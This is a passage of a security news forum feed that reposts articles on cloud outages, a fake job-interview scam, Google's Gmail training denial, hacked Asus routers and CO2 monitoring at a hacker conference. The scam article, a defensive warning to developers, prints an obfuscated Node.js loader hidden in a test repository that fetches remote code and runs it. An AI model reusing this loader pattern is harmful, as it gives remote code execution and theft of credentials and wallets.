	Sen. Elizabeth Warren, D-Mass., a long-standing critic of the tech industry, wrote on X after the AWS outage that it was a reason “to break up Big Tech.”
</p>

<p>
	 
</p>

<p>
	“If a company can break the entire internet, they are too big. Period,” she said.
</p>

<p>
	 
</p>

<p>
	Microsoft’s cloud computing platform, Azure, went down on Oct. 29, rendering a host of the company’s services inoperable around the globe just before its quarterly report. Those two outages each caused major headaches for at least two airlines, preventing passengers from checking in online: Delta, which uses AWS, and Alaska, which uses Azure.
</p>

<p>
	 
</p>

<p>
	Then came Cloudflare’s disruption Tuesday, which CEO Matthew Prince said was the company’s worst since 2019.
</p>

<p>
	 
</p>

<p>
	“We are sorry for the impact to our customers and to the Internet in general,” he wrote in a technical explanation after the outage.
</p>

<p>
	 
</p>

<p>
	“Given Cloudflare’s importance in the Internet ecosystem any outage of any of our systems is unacceptable,” he added. “That there was a period of time where our network was not able to route traffic is deeply painful to every member of our team. We know we let you down today.”
</p>

<p>
	 
</p>

<p>
	The three companies each dealt with different issues. Cloudflare initially thought it was under a massive cyberattack, but then traced the issue to a “bug” in its software to combat bots. AWS and Microsoft each had different issues configuring their services with the Domain Name System, or DNS, the notoriously finicky “phonebook” for the internet that connects website URLs with their technical, numerical addresses.
</p>

<p>
	 
</p>

<p>
	Those issues come a year after a particularly unusual case, in which companies around the world that used both Microsoft-based computers and the popular cybersecurity service CrowdStrike suddenly saw their systems crash and display the “blue screen of death.” The culprit was a glitch in what should have been a routine CrowdStrike automatic software update, leading to flight delays and medical and police networks going down for hours.
</p>

<p>
	 
</p>

<p>
	Ultimately, each was an instance of a minor software glitch that rippled across those companies’ enormous systems, crashing website after website.
</p>

<p>
	 
</p>

<p>
	Asad Ramzanali, the director of artificial intelligence and technology policy at Vanderbilt Policy Accelerator, as well as the former deputy director for strategy at the White House’s Office of Science and Technology Policy under the Biden administration, called the tendency for giant companies to experience such wide-ranging outages a national risk.
</p>

<p>
	 
</p>

<p>
	“This concentration is both a market failure and a national security risk when we have so much of society dependent on these layers of infrastructure,” he told NBC News.
</p>

<p>
	 
</p>

<p>
	James Kretchmar, the chief technology officer of Akamai’s Cloud Technology Group — another cloud services giant — said that it is always possible for a cloud company’s engineers to reduce outages’ likelihood and severity, but that companies need to use them strategically.
</p>

<p>
	 
</p>

<p>
	“You don’t have infinite nerds. But it’s not like this is something where you would have to throw your hands up and say, ‘There’s just no way,’” he said.
</p>

<p>
	 
</p>

<p>
	There’s also some growing push for these outages to be treated as more than minor nuisances or the cost of doing business in the digital age.
</p>

<p>
	 
</p>

<p>
	J.B. Branch, the Big Tech accountability advocate at Public Citizen, a progressive nonprofit that advocates for public interests, called for more government regulation of the cloud industry.
</p>

<p>
	 
</p>

<p>
	“There needs to be investigations whenever these outages happen, because whether we like it or not, the entire infrastructure that our economy is kind of running on, digitally at least, is owned by a handful of companies, and that’s incredibly concerning,” he said.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.nbcnews.com/tech/internet/internet-outages-aws-microsoft-cloudflare-rcna245043" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32599</guid><pubDate>Sun, 23 Nov 2025 15:44:32 +0000</pubDate></item><item><title>How I Almost Got Hacked By A 'Job Interview'</title><link>https://nsaneforums.com/news/security-privacy-news/how-i-almost-got-hacked-by-a-job-interview-r32597/</link><description><![CDATA[<div>
	<div>
		 
	</div>
	<strong><a href="https://hashnode.com/@daviddodda" rel="external nofollow"><span>David Dodda</span></a><span> </span><span>·</span><a href="https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview" rel="external nofollow"> Oct 15, 2025</a><span>· </span></strong>
</div>

<div>
	 
</div>

<div>
	I was 30 seconds away from running malware on my machine.
</div>

<div>
	<div>
		<div>
			<p>
				 
			</p>

			<p>
				The attack vector? A fake coding interview from a "legitimate" blockchain company.
			</p>

			<p>
				 
			</p>

			<p>
				Here's how a sophisticated scam operation almost got me, and why every developer needs to read this.
			</p>

			<p>
				 
			</p>

			<p>
				<strong>The Setup</strong>
			</p>
		</div>
	</div>
</div>

<p>
	Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works.
</p>

<p>
	 
</p>

<p>
	The message was smooth. Professional. "We're developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure."
</p>

<p>
	 
</p>

<p>
	I've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code reviews. I'm usually paranoid about security - or so I thought.
</p>

<p>
	 
</p>

<p>
	This looked legit. So I said yes to the call.
</p>

<p>
	 
</p>

<p>
	<strong>The Hook</strong>
</p>

<p>
	Before our meeting, Mykola sent me a "test project" - standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough.
</p>

<p>
	 
</p>

<p>
	The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one.
</p>

<p>
	 
</p>

<p>
	Here's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do - I started poking around the codebase without running it first.
</p>

<p>
	 
</p>

<p>
	Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush.
</p>

<p>
	 
</p>

<p>
	I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work.
</p>

<p>
	Then I had one of those paranoid developer moments.
</p>

<p>
	 
</p>

<p>
	<strong>The Save</strong>
</p>

<p>
	Before hitting <em><code>npm start</code></em>, I threw this prompt at my Cursor AI agent:
</p>

<p>
	 
</p>

<p>
	"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."
</p>

<p>
	 
</p>

<p>
	And holy sh*t.
</p>

<p>
	 
</p>

<p>
	Sitting right in the middle of <em><code>server/controllers/userController.js</code></em> was this beauty:
</p>


<div>
	<pre><code class="lang-javascript"><span>//Get Cookie  </span>
(<span>async</span> () =&gt; {  
    <span>const</span> byteArray = [  
        <span>104</span>, <span>116</span>, <span>116</span>, <span>112</span>, <span>115</span>, <span>58</span>, <span>47</span>, <span>47</span>, <span>97</span>, <span>112</span>, <span>105</span>, <span>46</span>, <span>110</span>, <span>112</span>, <span>111</span>, <span>105</span>,  
        <span>110</span>, <span>116</span>, <span>46</span>, <span>105</span>, <span>111</span>, <span>47</span>, <span>50</span>, <span>99</span>, <span>52</span>, <span>53</span>, <span>56</span>, <span>54</span>, <span>49</span>, <span>50</span>, <span>51</span>, <span>57</span>, <span>99</span>, <span>51</span>,  
        <span>98</span>, <span>50</span>, <span>48</span>, <span>51</span>, <span>49</span>, <span>102</span>, <span>98</span>, <span>57</span>  
    ];  
    <span>const</span> uint8Array = <span>new</span> <span>Uint8Array</span>(byteArray);  
    <span>const</span> decoder = <span>new</span> TextDecoder(<span>'utf-8'</span>);  
    axios.get(decoder.decode(uint8Array))  
        .then(<span><span>response</span> =&gt;</span> {  
            <span>new</span> <span>Function</span>(<span>"require"</span>, response.data.model)(<span>require</span>);  
        })  
        .catch(<span><span>error</span> =&gt;</span> { });  
})();</code></pre>

	<p>
		 
	</p>
</div>


<p>
	Obfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.
</p>

<p>
	 
</p>

<p>
	I decoded that byte array:
</p>

<p>
	<code>h**ps://api.npoint.io/2c458612399c3b2031fb9</code>
</p>

<p>
	 
</p>

<p>
	When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto wallets, files, passwords, your entire digital existence.
</p>

<p>
	 
</p>

<p>
	Here's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their infrastructure set up to burn evidence fast.
</p>

<p>
	 
</p>

<p>
	I ran the payload through VirusTotal - <a href="https://www.virustotal.com/gui/file/e2da104303a4e7f3bbdab6f1839f80593cdc8b6c9296648138bd2ee3cf7912d5/behavior" rel="external nofollow">check out the behavior analysis yourself</a>. Spoiler alert: it's nasty.
</p>

<p>
	 
</p>

<p>
	<strong>The Operation</strong>
</p>

<p>
	This wasn't some amateur hour scam. This was sophisticated:
</p>

<p>
	<strong style="line-height:32px;">The LinkedIn Profile</strong>: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even had those cringy LinkedIn posts about "innovation" and "blockchain consulting."
</p>

<p>
	<strong style="line-height:32px;">The Company</strong>: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts about "transforming real estate with blockchain." They even had affiliated pages and follower networks.
</p>

<p>
	<strong style="line-height:32px;">The Approach</strong>: No red flags in the initial outreach. Professional language. Reasonable project scope. They even used Calendly for scheduling.
</p>

<p>
	<strong style="line-height:32px;">The Payload</strong>: The malicious code was positioned strategically in the server-side controller, ready to execute with full Node.js privileges when admin functionality was accessed.
</p>

<p>
	 
</p>

<p>
	<strong>The Psychology</strong>
</p>

<p>
	Here's what made this so dangerous:
</p>

<p>
	<strong style="line-height:32px;">Urgency</strong>: "Complete the test before the meeting to save time."
</p>

<p>
	<strong style="line-height:32px;">Authority</strong>: LinkedIn verified profile, real company, professional setup.
</p>

<p>
	<strong style="line-height:32px;">Familiarity</strong>: Standard take-home coding test. Every developer has done dozens of these.
</p>

<p>
	<strong style="line-height:32px;">Social Proof</strong>: Real company page with real employees and real connections.
</p>

<p>
	I almost fell for it. And I'm paranoid about this stuff.
</p>

<p>
	 
</p>

<p>
	<strong>The Lesson</strong>
</p>

<p>
	One simple AI prompt saved me from disaster.
</p>

<p>
	 
</p>

<p>
	Not fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious patterns before executing unknown code.
</p>

<p>
	 
</p>

<p>
	The scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub repos, npm packages, coding challenges. Most of us don't sandbox every single thing.
</p>

<p>
	 
</p>

<p>
	And this was server-side malware. Full Node.js privileges. Access to environment variables, database connections, file systems, crypto wallets. Everything.
</p>

<p>
	 
</p>

<p>
	<strong>The Scale</strong>
</p>

<p>
	If this sophisticated operation is targeting developers at scale, how many have already been compromised? How many production systems are they inside right now?
</p>

<p>
	<strong style="line-height:32px;">Perfect Targeting</strong>: Developers are ideal victims. Our machines contain the keys to the kingdom: production credentials, crypto wallets, client data.
</p>

<p>
	<strong style="line-height:32px;">Professional Camouflage</strong>: LinkedIn legitimacy, realistic codebases, standard interview processes.
</p>

<p>
	<strong style="line-height:32px;">Technical Sophistication</strong>: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side execution.
</p>

<p>
	One successful infection could compromise production systems at major companies, crypto holdings worth millions, personal data of thousands of users.
</p>

<p>
	 
</p>

<p>
	<strong>The Bottom Line</strong>
</p>

<p>
	If you're a developer getting LinkedIn job opportunities:
</p>

<ol>
	<li>
		<p>
			<strong style="line-height:32px;">Always sandbox unknown code</strong>. Docker containers, VMs, whatever. Never run it on your main machine.
		</p>
	</li>
	<li>
		<p>
			<strong style="line-height:32px;">Use AI to scan for suspicious patterns</strong>. Takes 30 seconds. Could save your entire digital life.
		</p>
	</li>
	<li>
		<p>
			<strong style="line-height:32px;">Verify everything</strong>. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity.
		</p>
	</li>
	<li>
		<p>
			<strong style="line-height:32px;">Trust your gut</strong>. If someone's rushing you to execute code, that's a red flag.
		</p>
	</li>
</ol>

<p>
	This scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt exposed the whole thing.
</p>

<p>
	 
</p>

<p>
	The next time someone sends you a "coding challenge," remember this story.
</p>

<p>
	 
</p>

<p>
	Your crypto wallet will thank you.
</p>

<p>
	 
</p>

<hr />
<p>
	<em style="line-height:32px;">If you're a developer who has run "coding challenges" from LinkedIn recruiters, you should probably read this twice.</em>
</p>

<p>
	 
</p>

<p>
	<em style="line-height:32px;"><a href="https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview" rel="external nofollow">Source</a></em>
</p>
]]></description><guid isPermaLink="false">32597</guid><pubDate>Sun, 23 Nov 2025 00:16:53 +0000</pubDate></item><item><title>Google: We don't train Gemini on your Gmail inbox</title><link>https://nsaneforums.com/news/security-privacy-news/google-we-dont-train-gemini-on-your-gmail-inbox-r32592/</link><description><![CDATA[<p>
	For the past couple of days, news has been circulating online that Google is using your emails stored in Gmail to train its AI models. This claim has gained traction online thanks to viral social media posts and reports from <a automate_uuid="d375c84a-d5ba-472b-855a-62a304753500" href="https://www.malwarebytes.com/blog/news/2025/11/gmail-is-reading-your-emails-and-attachments-to-train-its-ai-unless-you-turn-it-off" rel="external nofollow">even Malwarebytes</a> that Google has introduced new AI features for Gmail to enable this behavior. Now, Google has decided to set the record straight on this topic.
</p>

<p>
	 
</p>

<p>
	In a post on X (formerly Twitter), the official Gmail account has refuted any claims around this topic, stating in no uncertain terms that it does not use your Gmail content to train Gemini, and that it has not modified anyone's settings to enable this behavior either. The full post can be seen below:
</p>

<p>
	 
</p>

<div class="ipsEmbeddedOther" contenteditable="false">
	<iframe allowfullscreen="" class="ipsEmbed_finishedLoading" data-controller="core.front.core.autosizeiframe" data-embedid="embed3881266793" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/gmail/status/1991989459097653419" style="overflow: hidden; height: 495px;"></iframe>
</div>

<p>
	Prior to this post, there were multiple allegations online that since you are opted in to Google's "Smart Features" for Gmail automatically, the company can leverage that data to train Gemini. While the former part is indeed true, the latter is definitely not, according to Google. In fact, the company has a dedicated support article for customers about how they can <a automate_uuid="6976ff4d-c514-4b6e-b130-0d0b17ce48a6" href="https://support.google.com/mail/answer/15604322" rel="external nofollow">disable Smart Features</a> across all of its products.
</p>

<p>
	 
</p>

<p>
	This is not the first time in recent memory that Google has been the target of wild online claims. Just a couple of weeks ago, a major trove of data procured from breaches <a automate_uuid="6e580b73-3584-4329-b71c-d41ecffbab39" href="https://www.neowin.net/news/have-i-been-pwned-adds-biggest-trove-of-breaches-and-no-gmail-wasnt-hacked/" rel="external nofollow">seemingly contained 394 million Gmail addresses</a>. However, it was later confirmed that this data was not extracted through a Gmail hack and most of it had nothing to do at all with the service itself.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/google-we-dont-train-gemini-on-your-gmail-inbox/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Sunday 23 November 2025 at 3:32 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32592</guid><pubDate>Sat, 22 Nov 2025 17:33:48 +0000</pubDate></item><item><title>How to know if your Asus router is one of thousands hacked by China-state hackers</title><link>https://nsaneforums.com/news/security-privacy-news/how-to-know-if-your-asus-router-is-one-of-thousands-hacked-by-china-state-hackers-r32587/</link><description><![CDATA[<h3>
	So far, the hackers are lying low, likely for later use.
</h3>

<p>
	Thousands of Asus routers have been hacked and are under the control of a suspected China-state group that has yet to reveal its intentions for the mass compromise, researchers said.
</p>

<p>
	 
</p>

<p>
	The hacking spree is either primarily or exclusively targeting seven models of Asus routers, all of which are no longer supported by the manufacturer, meaning they no longer receive security patches, researchers from SecurityScorecard <a href="https://securityscorecard.com/wp-content/uploads/2025/11/STRIKE_Asus_WrtHug-Report_V6.pdf" rel="external nofollow">said</a>. So far, it’s unclear what the attackers do after gaining control of the devices. SecurityScorecard has named the operation WrtHug.
</p>

<h2>
	Staying off the radar
</h2>

<p>
	SecurityScorecard said it suspects the compromised devices are being used similarly to those found in ORB (operational relay box) networks, which hackers primarily use to conduct espionage to conceal their identity.
</p>

<p>
	 
</p>

<p>
	“Having this level of access may enable the threat actor to use any compromised router as they see fit,” SecurityScorecard said. “Our experience with ORB networks suggests compromised devices will commonly be used for covert operations and espionage, unlike DDoS attacks and other types of overt malicious activity typically observed from botnets.”
</p>

<p>
	 
</p>

<p>
	Compromised routers are concentrated in Taiwan, with smaller clusters in South Korea, Japan, Hong Kong, Russia, central Europe, and the United States.
</p>

<figure class="ars-wp-img-shortcode id-2128954 align-center">
	<div>
		<div class="ars-lightbox">
			<div class="ars-lightbox-item">
				<img alt="wrthug-map-1024x377.jpg" class="ipsImage" decoding="async" height="720" width="720" src="https://cdn.arstechnica.net/wp-content/uploads/2025/11/wrthug-map-1024x377.jpg">
				<div class="pswp-caption-content" id="caption-2128954">
					<em>A heat map of infected devices. </em>
				</div>
			</div>
		</div>
	</div>
</figure>

<p>
	The Chinese government has been caught building massive ORB networks for years. In <a href="https://arstechnica.com/gadgets/2021/07/home-and-office-routers-come-under-attack-by-china-state-hackers-france-warns/" rel="external nofollow">2021</a>, the French government warned national businesses and organizations that the APT31—one of China’s most active threat groups—was behind a massive attack campaign that used hacked routers to conduct reconnaissance. <a href="https://arstechnica.com/security/2024/01/chinese-malware-removed-from-soho-routers-after-fbi-issues-covert-commands/" rel="external nofollow">Last year</a>, at least <a href="https://arstechnica.com/security/2024/09/massive-china-state-iot-botnet-went-undetected-for-four-years-until-now/" rel="external nofollow">three</a> similar <a href="https://arstechnica.com/security/2024/02/kremlin-backed-hackers-are-infecting-ubiquity-edgerouters-fbi-warns/" rel="external nofollow">China-operated campaigns</a> came to light.
</p>

<p>
	 
</p>

<p>
	Russian-state hackers have been caught doing the same thing, although not as frequently. In <a href="https://arstechnica.com/information-technology/2018/05/hackers-infect-500000-consumer-routers-all-over-the-world-with-malware/" rel="external nofollow">2018</a>, Kremlin actors infected more than 500,000 small office and home routers with <a href="https://arstechnica.com/information-technology/2018/05/hackers-infect-500000-consumer-routers-all-over-the-world-with-malware/" rel="external nofollow">sophisticated malware</a> tracked as VPNFilter. A Russian government group was also independently involved in an operation reported in one of the 2024 router hacks linked above.
</p>

<p>
	 
</p>

<p>
	Consumer routers make an ideal hideout for hackers. The inexpensive gear often runs versions of Linux that, in turn, can run malware that operates behind the scenes. The hackers then log into the routers to conduct malicious activities. Rather than originating from infrastructure and IP addresses defenders know to be hostile, the connections come from benign-appearing devices hosted by addresses with trustworthy reputations, allowing them to receive a green light from security defenses.
</p>

<p>
	 
</p>

<p>
	During the WrtHug infection process, devices open a dialog box on connected devices that instructs users to install a self-signed TLS certificate. Asus routers, like those for many other manufacturers, by default require users to accept such certificates in order to encrypt connections between a user and the device when using the web-based administrative interface. Because users are in the habit of approving such requests, they rarely suspect anything is amiss. Self-signed certificates don’t comply with TLS specifications because their users can’t be vetted, and there’s no means to revoke certificates once they are detected as malicious.
</p>

<p>
	 
</p>

<p>
	The WrtHug campaign uses functionality provided by AICloud, a proprietary Asus service that allows users to access files stored on local machines from the Internet.
</p>

<p>
	 
</p>

<p>
	So far, the SecurityScorecard researchers haven’t seen any post-exploit behavior coming from the infected routers. Marty Kareem, signals collection engineer at SecurityScorecard, wrote in an interview:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		We have yet to observe any malicious payload dropped by the threat actor to compromise these devices, though our access to observe it is limited, as it requires obtaining a compromised device and studying it directly. There are reported instances where volatile binaries were dropped to perform kernel level changes, and then they erased themselves upon a reboot, leaving only the required changed configuration in place. It is also possible that the actor used no payload at all and leveraged the vulnerabilities to cause direct OS changes (these are feasible with the vulnerabilities we have observed in this campaign). All-in-All, it is early to determine the exact chain of infection that leads to the end result, or post-exploitation results, which we observed – a high-level access that enables certificate swapping and other admin-level privileges. If I may add one more thing, gaining administrative access to the device at the same level of the device owner is A-Lot and should not be taken lightly, as that is what most threat actors attempt to achieve in most intrusion campaigns.
	</p>
</blockquote>

<h2>
	Am I infected?
</h2>

<p>
	The Asus router models that SecurityScorecard knows to be targeted are:
</p>

<p>
	 
</p>

<ul>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router 4G-AC55U</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router 4G-AC860U</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router DSL-AC68U</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router GT-AC5300</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router GT-AX11000</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router RT-AC1200HP</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router RT-AC1300GPLUS</span>
	</li>
	<li aria-level="1" style="font-weight: 400;">
		<span style="font-weight: 400;">Asus Wireless Router RT-AC1300UHP</span>
	</li>
</ul>

<p>
	 
</p>

<p>
	The easiest way to determine whether a router has been compromised is to inspect the self-signed certificate, which can be done by following the instructions <a href="https://www.asus.com/me-en/support/faq/1045854/#:~:text=The%20Export%20button%20for%20Download%20certificate%20is%20not%20displayed%20in,click%20%5BApply%5D%20to%20save." rel="external nofollow">here</a>. The certificate used by the attackers has an expiration year of 2122, a lengthy time span that valid certificates would never have. Both the issuer and subject in the certificate list CN=a,OU=a,O=a,L=a,ST=a,C=aa.
</p>

<p>
	 
</p>

<figure class="ars-wp-img-shortcode id-2128962 align-center">
	<div>
		<div class="ars-lightbox">
			<div class="ars-lightbox-item">
				<img alt="wrthug-certificate-1024x1035.jpg" class="ipsImage" decoding="async" height="720" width="720" src="https://cdn.arstechnica.net/wp-content/uploads/2025/11/wrthug-certificate-1024x1035.jpg">
				<div class="pswp-caption-content" id="caption-2128962">
					<em>The self-signed certificate installed. </em>
				</div>
			</div>
		</div>
	</div>
</figure>

<p>
	SecurityScorecard’s report lists other indicators users can examine for other signs of compromise.
</p>

<p>
	 
</p>

<p>
	People using end-of-life routers and other Internet of Things devices should strongly consider replacing them with ones that receive regular security updates. Disabling AICloud, remote administrator capabilities, SSH, UPnP, port forwarding, and other unnecessary services is also a good precaution, even for users of other router models.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2025/11/thousands-of-hacked-asus-routers-are-under-control-of-suspected-china-state-hackers/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 22 November 2025 at 4:07 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32587</guid><pubDate>Sat, 22 Nov 2025 06:08:12 +0000</pubDate></item><item><title>This Hacker Conference Installed a Literal Anti-Virus Monitoring System</title><link>https://nsaneforums.com/news/security-privacy-news/this-hacker-conference-installed-a-literal-anti-virus-monitoring-system-r32581/</link><description><![CDATA[<h3>
	At New Zealand's Kawaiicon cybersecurity convention, organizers hacked together a way for attendees to track CO2 levels throughout the venue—even before they arrived.
</h3>

<p>
	<span class="lead-in-text-callout">Hacker conferences—like all</span> conventions—are notorious for giving attendees a parting gift of mystery illness. To combat “con crud,” New Zealand's premier hacker conference, Kawaiicon, quietly launched a real-time, room-by-room carbon dioxide monitoring system for attendees.
</p>

<p>
	 
</p>

<p>
	To get the system up and running, event organizers installed DIY CO<sub>2</sub> monitors throughout the Michael Fowler Centre venue before conference doors opened on November 6. Attendees were able to check a public online dashboard for clean air readings for session rooms, kids’ areas, the front desk, and more, all before even showing up. "It’s ALMOST like we are all nerds in a risk-based industry," the organizers <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://kawaiicon.org/health-and-safety/" href="https://kawaiicon.org/health-and-safety/" rel="external nofollow" target="_blank">wrote</a> on the convention’s website.
</p>

<p>
	 
</p>

<p>
	"What they did is fantastic," Jeff Moss, founder of the <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://defcon.org/" href="https://defcon.org/" rel="external nofollow" target="_blank">Defcon</a> and <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://blackhat.com/" href="https://blackhat.com/" rel="external nofollow" target="_blank">Black Hat</a> security conferences, told WIRED. "CO<sub>2</sub> is being used as an approximation for so many things, but there are no easy, inexpensive network monitoring solutions available. Kawaiicon building something to do this is the true spirit of hacking."
</p>

<p>
	 
</p>

<div class="AssetEmbedAssetContainer-eEeytc eRSvCP asset-embed__asset-container">
	<span class="SpanWrapper-zEXFr koTknX responsive-asset AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset"><picture class="ResponsiveImagePicture-cGZhnX jwYQWO AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset responsive-image"><img alt="OS%202025-11-04-152405_002.jpeg" class="ipsImage" height="720" width="720" src="https://media.wired.com/photos/69161c511d8bf9bf6681cdbd/master/w_960,c_limit/OS%202025-11-04-152405_002.jpeg"></picture></span>
</div>

<div class="CaptionWrapper-jYrTxZ byeLF caption AssetEmbedCaption-fyuOdR eXMqGf asset-embed__caption standard" data-event-boundary="click" data-event-click='{"pattern":"Caption"}' data-in-view='{"pattern":"Caption"}' data-include-experiments="true" data-testid="caption-wrapper">
	<em><span class="BaseWrap-sc-gzmcOU BaseText-eqOrNE CaptionCredit-eowWKH deqABF kpqIso gxwcqg caption__credit">Courtesy of Oliver Seiler</span></em>
</div>

<p>
	Elevated levels of CO<sub>2</sub> lead to reduced cognitive ability and <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://theconversation.com/the-role-of-carbon-dioxide-in-airborne-disease-transmission-a-hidden-key-to-safer-indoor-spaces-229142" href="https://theconversation.com/the-role-of-carbon-dioxide-in-airborne-disease-transmission-a-hidden-key-to-safer-indoor-spaces-229142" rel="external nofollow" target="_blank">facilitate</a> transmission of airborne viruses, which can linger in poorly ventilated spaces for hours. The more CO<sub>2</sub> in the air, <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.statnews.com/2024/06/04/co2-ventilation-research-virus-airborne-life-haddrell-celebs/" href="https://www.statnews.com/2024/06/04/co2-ventilation-research-virus-airborne-life-haddrell-celebs/" rel="external nofollow" target="_blank">the more virus-friendly the air becomes</a>, making CO<sub>2</sub> data a handy proxy for tracing pathogens. 
In fact, the Australian Academy of Science <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.science.org.au/news-and-events/news-and-media-releases/time-to-act-to-improve-the-air-we-share-indoors" href="https://www.science.org.au/news-and-events/news-and-media-releases/time-to-act-to-improve-the-air-we-share-indoors" rel="external nofollow" target="_blank">described the pollution in indoor air</a> as “someone else’s breath backwash.” Kawaiicon organizers faced running a large infosec event during a <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.stuff.co.nz/nz-news/360875862/what-going-happen-measles-outbreak-heres-worst-case-scenario" href="https://www.stuff.co.nz/nz-news/360875862/what-going-happen-measles-outbreak-heres-worst-case-scenario" rel="external nofollow" target="_blank">measles</a> outbreak, as well as constantly rolling waves of Covid-19, influenza, and RSV. It’s a familiar pain point for conference organizers frustrated by massive gaps in public health—and lack of control over their venue’s clean air standards.
</p>

<p>
	 
</p>

<p>
	"In general, the Michael Fowler venue has a single HVAC system, and uses Farr 30/30 filters with a rating of MERV-8,” Kawaiicon organizers explained, referencing the filtration choices in the space where the convention was held. MERV-8 is a budget-friendly choice–standard practice for homes. “The hardest part of the whole process is being limited by what the venue offers,” they explained. “The venue is older, which means less tech to control air flow, and an older HVAC system.”
</p>

<p>
	 
</p>

<p>
	Kawaiicon’s work began one month before the conference. In early October, organizers deployed a small fleet of 13 <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://learn.adafruit.com/matrix-portal-room-co2-monitor/overview" href="https://learn.adafruit.com/matrix-portal-room-co2-monitor/overview" rel="external nofollow" target="_blank">RGB Matrix Portal Room CO<sub>2</sub> Monitors</a>, an ambient carbon dioxide monitor DIY project adapted from US electronics and kit company Adafruit Industries. The monitors were connected to an internet-accessible dashboard with live readings, daily highs and lows, and data history that showed attendees in-room CO<sub>2</sub> trends. Kawaiicon tested its CO<sub>2</sub> monitors <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://github.com/oseiler2/co2monitor?tab=readme-ov-file#why-use-a-co2-monitor" href="https://github.com/oseiler2/co2monitor?tab=readme-ov-file#why-use-a-co2-monitor" rel="external nofollow" target="_blank">in collaboration with researchers</a> from the University of Otago’s public health department.
</p>

<p>
	 
</p>

